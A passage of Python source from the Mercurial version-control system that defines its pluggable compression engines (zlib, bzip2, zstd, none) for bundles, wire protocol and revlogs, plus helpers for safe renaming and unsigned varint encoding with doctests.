        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.
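
        For example, the zlib engine in this module declares
        ``compenginewireprotosupport('zlib', 20, 20)``, so it sorts after
        ``zstd`` (priority 50); ``bzip2`` declares priority 0 and is
        therefore not advertised by default.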

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)``
        method that returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``RevlogError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = zlib.decompressobj()
            for chunk in filechunkiter(fh):
                while chunk:
                    # Limit output size to limit memory.
                    yield d.decompress(chunk, 2 ** 18)
                    chunk = d.unconsumed_tail

        return chunkbuffer(gen())

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

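            # Below this (empirical) threshold, zlib's header and checksum
            # overhead make a net size win unlikely, so don't even try.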
            if insize < 44:
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        def gen():
            d = bz2.BZ2Decompressor()
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        def gen():
            # The input stream doesn't have the 'BZ' header. So add it back.
            d = bz2.BZ2Decompressor()
            d.decompress('BZ')
            for chunk in filechunkiter(fh):
                yield d.decompress(chunk)

        return chunkbuffer(gen())

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't, because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

class _zstdengine(compressionengine):
    def name(self):
        return 'zstd'

    @propertycache
    def _module(self):
        # Not all installs have the zstd module available. So defer importing
        # until first access.
        try:
            from . import zstd
            # Force delayed import.
            zstd.__version__
            return zstd
        except ImportError:
            return None

    def available(self):
        return bool(self._module)

    def bundletype(self):
        """A modern compression algorithm that is fast and highly flexible.

        Only supported by Mercurial 4.1 and newer clients.

        With the default settings, zstd compression is both faster and yields
        better compression than ``gzip``. It also frequently yields better
        compression than ``bzip2`` while operating at much higher speeds.

        If this engine is available and backwards compatibility is not a
        concern, it is likely the best available engine.
        """
        return 'zstd', 'ZS'

    def wireprotosupport(self):
        return compewireprotosupport('zstd', 50, 50)

    def revlogheader(self):
        return '\x28'

    def compressstream(self, it, opts=None):
        opts = opts or {}
        # zstd level 3 is almost always significantly faster than zlib
        # while providing no worse compression. It strikes a good balance
        # between speed and compression.
        level = opts.get('level', 3)

        zstd = self._module
        z = zstd.ZstdCompressor(level=level).compressobj()
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        zstd = self._module
        dctx = zstd.ZstdDecompressor()
        return chunkbuffer(dctx.read_from(fh))

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # Writing the content size adds a few bytes to the output. However,
            # it allows decompression to be more optimal since we can
            # pre-allocate a buffer to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level,
                                             write_content_size=True)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                return None

            elif insize <= 1000000:
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())

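# An illustrative sketch of consuming the registry ('gzip' is the bundle
# name registered by the zlib engine above):
#
#   engine = compengines.forbundlename('gzip')
#   data = ''.join(engine.compressstream(iter(['some data'])))
#   fh = engine.decompressorreader(stringio(data))
#   fh.read(9)  # -> 'some data'
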
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = pycompat.sysstr('``%s``\n    %s') % (
            bt[0], engine.bundletype.__doc__)

        value = docobject()
        value.__doc__ = doc
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items

i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f:      filename to rename
    tag:    a string tag that will be included in the new name
    ctx:    a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
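
    An illustrative example (sets stand in for the context and others):

    >>> safename(b'foo', b'tag', {b'foo~tag'}, {b'foo~tag~1'})
    'foo~tag~2'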
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn

def readexactly(stream, n):
    '''read n bytes from stream.read and abort if less was available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
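    # Emit the value seven bits at a time, least significant group first,
    # setting the continuation bit (0x80) on every byte but the last.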
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
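    # Accumulate seven payload bits per byte until a byte arrives without
    # the continuation bit (0x80) set.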
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7